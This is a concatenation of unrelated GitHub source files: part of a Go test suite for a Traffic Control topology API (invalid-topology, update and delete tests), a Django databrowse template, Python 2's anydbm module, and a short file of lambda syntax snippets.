{Cachegroup: "cachegroup1", Parents: []int{0}},
}}},
{testCaseDescription: "a cycle across cache groups", Topology: tc.Topology{Name: "cycle-with-non-topology-cachegroups", Description: "Invalid because it contains a cycle when combined with a topology constructed from cache group parentage", Nodes: []tc.TopologyNode{
{Cachegroup: "edge-parent1", Parents: []int{1}},
{Cachegroup: "has-edge-parent1", Parents: []int{}},
}}},
{testCaseDescription: "a nonexistent cache group", Topology: tc.Topology{Name: "nonexistent-cg", Description: "Invalid because it references a cache group that does not exist", Nodes: []tc.TopologyNode{
{Cachegroup: "legitcachegroup", Parents: []int{0}},
}}},
{testCaseDescription: "an out-of-bounds parent index", Topology: tc.Topology{Name: "oob-parent", Description: "Invalid because it contains an out-of-bounds parent", Nodes: []tc.TopologyNode{
{Cachegroup: "cachegroup1", Parents: []int{7}},
}}},
}
var statusCode int
for _, testCase := range invalidTopologyTestCases {
_, reqInf, err := TOSession.CreateTopology(testCase.Topology)
if err == nil {
t.Fatalf("expected POST with %v to return an error, actual: nil", testCase.testCaseDescription)
}
statusCode = reqInf.StatusCode
if statusCode < 400 || statusCode >= 500 {
t.Fatalf("Expected a 400-level status code for topology %s but got %d", testCase.Topology.Name, statusCode)
}
}
}
func updateSingleTopology(topology tc.Topology) error {
updateResponse, _, err := TOSession.UpdateTopology(topology.Name, topology)
if err != nil {
return fmt.Errorf("cannot PUT topology: %v - %v", err, updateResponse)
}
updateResponse.Response.LastUpdated = nil
if !reflect.DeepEqual(topology, updateResponse.Response) {
return fmt.Errorf("Topologies should be equal after updating. expected: %v\nactual: %v", topology, updateResponse.Response)
}
return nil
}
func UpdateTestTopologies(t *testing.T) {
topologiesCount := len(testData.Topologies)
for index := range testData.Topologies {
topology := testData.Topologies[(index+1)%topologiesCount]
topology.Name = testData.Topologies[index].Name // We cannot update a topology's name
if err := updateSingleTopology(topology); err != nil {
t.Fatalf(err.Error())
}
}
// Revert test topologies
for _, topology := range testData.Topologies {
if err := updateSingleTopology(topology); err != nil {
t.Fatalf(err.Error())
}
}
}
func DeleteTestTopologies(t *testing.T) {
for _, top := range testData.Topologies {
delResp, _, err := TOSession.DeleteTopology(top.Name)
if err != nil {
t.Fatalf("cannot DELETE topology: %v - %v", err, delResp)
}
deleteLog, _, err := TOSession.GetLogsByLimit(1)
if err != nil {
t.Fatalf("unable to get latest audit log entry")
}
if len(deleteLog) != 1 {
t.Fatalf("log entry length - expected: 1, actual: %d", len(deleteLog))
}
if !strings.Contains(*deleteLog[0].Message, top.Name) {
t.Errorf("topology deletion audit log entry - expected: message containing topology name '%s', actual: %s", top.Name, *deleteLog[0].Message)
}
topology, _, err := TOSession.GetTopology(top.Name)
if err == nil {
t.Fatalf("expected error trying to GET deleted topology: %s, actual: nil", top.Name)
}
if topology != nil {
t.Fatalf("expected nil trying to GET deleted topology: %s, actual: non-nil", top.Name)
}
}
}
| {
"pile_set_name": "Github"
} |
{% extends "databrowse/base_site.html" %}
{% block title %}{{ model.verbose_name_plural|capfirst|escape }} by {{ field.field.verbose_name|escape }}{% endblock %}
{% block content %}
<div id="breadcrumbs"><a href="{{ root_url }}">Home</a> / <a href="{{ model.url }}">{{ model.verbose_name_plural|capfirst }}</a> / <a href="../">Fields</a> / By {{ field.field.verbose_name|escape }}</div>
<h1>{{ model.verbose_name_plural|capfirst|escape }} by {{ field.field.verbose_name|escape }}</h1>
<ul class="objectlist">
{% for object in object_list %}
<li class="{% cycle 'odd' 'even' %}"><a href="{{ object|iriencode }}/">{{ object|escape }}</a></li>
{% endfor %}
</ul>
{% endblock %}
| {
"pile_set_name": "Github"
} |
"""Generic interface to all dbm clones.
Instead of
import dbm
d = dbm.open(file, 'w', 0666)
use
import anydbm
d = anydbm.open(file, 'w')
The returned object is a dbhash, gdbm, dbm or dumbdbm object,
dependent on the type of database being opened (determined by whichdb
module) in the case of an existing dbm. If the dbm does not exist and
the create or new flag ('c' or 'n') was specified, the dbm type will
be determined by the availability of the modules (tested in the above
order).
It has the following interface (key and data are strings):
d[key] = data # store data at key (may override data at
# existing key)
data = d[key] # retrieve data at key (raise KeyError if no
# such key)
del d[key] # delete data stored at key (raises KeyError
# if no such key)
flag = key in d # true if the key exists
list = d.keys() # return a list of all existing keys (slow!)
Future versions may change the order in which implementations are
tested for existence, and add interfaces to other dbm-like
implementations.
"""
class error(Exception):
pass
_names = ['dbhash', 'gdbm', 'dbm', 'dumbdbm']
_errors = [error]
_defaultmod = None
for _name in _names:
try:
_mod = __import__(_name)
except ImportError:
continue
if not _defaultmod:
_defaultmod = _mod
_errors.append(_mod.error)
if not _defaultmod:
raise ImportError, "no dbm clone found; tried %s" % _names
error = tuple(_errors)
def open(file, flag='r', mode=0666):
"""Open or create database at path given by *file*.
Optional argument *flag* can be 'r' (default) for read-only access, 'w'
for read-write access of an existing database, 'c' for read-write access
to a new or existing database, and 'n' for read-write access to a new
database.
Note: 'r' and 'w' fail if the database doesn't exist; 'c' creates it
only if it doesn't exist; and 'n' always creates a new database.
"""
# guess the type of an existing database
from whichdb import whichdb
result=whichdb(file)
if result is None:
# db doesn't exist
if 'c' in flag or 'n' in flag:
# file doesn't exist and the new
# flag was used so use default type
mod = _defaultmod
else:
raise error, "need 'c' or 'n' flag to open new db"
elif result == "":
# db type cannot be determined
raise error, "db type could not be determined"
else:
mod = __import__(result)
return mod.open(file, flag, mode)
| {
"pile_set_name": "Github"
} |
lambda
lambda x, y
lambda x 1
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.